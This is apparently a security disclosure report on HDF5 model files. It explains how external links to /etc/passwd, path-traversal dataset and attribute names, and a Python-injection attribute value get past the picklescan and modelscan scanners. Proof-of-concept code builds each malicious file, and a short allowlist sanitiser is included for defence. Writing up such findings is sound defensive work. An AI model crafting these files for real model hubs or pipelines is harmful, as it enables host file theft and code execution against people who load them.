# HDF5: External Link File Read + Path Traversal + Attribute Injection
## Summary
Three non-pickle attack classes against the HDF5 model file format (`.h5`, `.hdf5`) that bypass both picklescan 1.0.4 and modelscan 0.8.8 (3/3 MISSED by both):

- **External link → arbitrary file read**: HDF5 `ExternalLink` objects reference files on the host filesystem. When accessed, h5py opens the linked file. A malicious model with `ExternalLink("/etc/passwd", "/")` reads host files.
- **Path traversal in dataset names**: dataset paths like `../../../tmp/evil` are accepted and preserved in the HDF5 virtual filesystem. Tools that extract datasets to disk write outside the target directory.
- **Code injection in attributes**: attribute names and values accept arbitrary strings, including Python code and path traversal characters. Downstream tools that eval attributes or use attribute names as paths are vulnerable.
Format: HDF5 ($1,500 MFV)
Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 → 3/3 MISSED by both
## Payloads
| File | Attack | Impact | picklescan | modelscan |
|---|---|---|---|---|
| `hdf5_external_link.h5` | `ExternalLink("/etc/passwd", "/")` | Arbitrary file read when link is accessed | MISSED | MISSED |
| `hdf5_traversal.h5` | Dataset path `../../../tmp/pwned` | File write on dataset extraction | MISSED | MISSED |
| `hdf5_attr_injection.h5` | Code in attribute value + traversal in attribute name | Injection if attrs are evaluated or used as paths | MISSED | MISSED |
## Vulnerability Details
### External Link → File Read (CWE-22)
HDF5 supports external links that reference other files. When a dataset accessed via an external link is read, h5py opens the referenced file from the host filesystem:
```python
import h5py, numpy as np

# Create malicious model
with h5py.File("evil_model.h5", "w") as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret_data"] = h5py.ExternalLink("/etc/passwd", "/")

# Victim loads model and iterates datasets:
with h5py.File("evil_model.h5", "r") as f:
    for key in f.keys():
        data = f[key]  # accessing "secret_data" opens /etc/passwd
```
In ML pipelines, models are loaded from untrusted sources (Hugging Face Hub, shared storage). The external link is embedded in the HDF5 file itself: no user interaction is required beyond loading.
### Path Traversal in Dataset Names (CWE-22)
HDF5's virtual filesystem accepts path traversal in group/dataset names:
```python
import h5py, numpy as np

with h5py.File("model.h5", "w") as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0]))
```
HDF5 treats `..` as an ordinary group name rather than a parent reference, so the traversal sequence is stored verbatim in the file. h5py keeps these names inside the HDF5 namespace, but tools that map HDF5 paths to filesystem paths during extraction are vulnerable.
### Attribute Injection (CWE-94)
Attribute names and values are unrestricted:
```python
import h5py, numpy as np

with h5py.File("model.h5", "w") as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'
```
Verified: both attribute names with path traversal and values with Python code are preserved verbatim. Tools that:
- Use attribute names as file paths (export tools)
- Render attribute values in web UIs (model registries)
- Pass attribute values to template engines or eval()
are vulnerable to injection.
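A consumer that must reuse attribute names (e.g. as export filenames) can apply a strict allowlist rather than trying to blocklist hostile characters. A minimal sketch, with the regex and function name as illustrative choices, not from any library:

```python
import re

# Allow letters, digits, underscore, dot, hyphen; reject anything containing
# a path separator, and reject names made only of dots (catches "..").
_SAFE_NAME = re.compile(r"^(?!\.+$)[A-Za-z0-9_.\-]+$")

def safe_attr_name(name: str) -> bool:
    """Return True only for attribute names safe to reuse as file names."""
    return bool(_SAFE_NAME.match(name))
```

Attribute values should never reach `eval()` or a template engine; they are attacker-controlled data and must be escaped like any other untrusted input.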
## Proof of Concept
```python
import h5py, numpy as np

# Payload 1: External link
with h5py.File("hdf5_external_link.h5", "w") as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret"] = h5py.ExternalLink("/etc/passwd", "/")

# Payload 2: Path traversal
with h5py.File("hdf5_traversal.h5", "w") as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0, 2.0]))
    f.create_dataset("normal_weights", data=np.random.randn(10, 10))

# Payload 3: Attribute injection
with h5py.File("hdf5_attr_injection.h5", "w") as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'
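As a sanity check that the injected strings survive a write/read round trip, the following re-creates payload 3 in a temp directory and reads it back (the strings are inert data unless downstream code evaluates them):

```python
import os
import tempfile

import h5py
import numpy as np

path = os.path.join(tempfile.gettempdir(), "hdf5_attr_injection.h5")

# Re-create payload 3, then read it back.
with h5py.File(path, "w") as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

with h5py.File(path, "r") as f:
    attrs = dict(f["weights"].attrs)

# Both hostile strings come back verbatim: nothing is executed on read.
assert attrs["../../../tmp/evil"] == "traversal in attr name"
assert attrs["description"] == '__import__("os").system("id")'
```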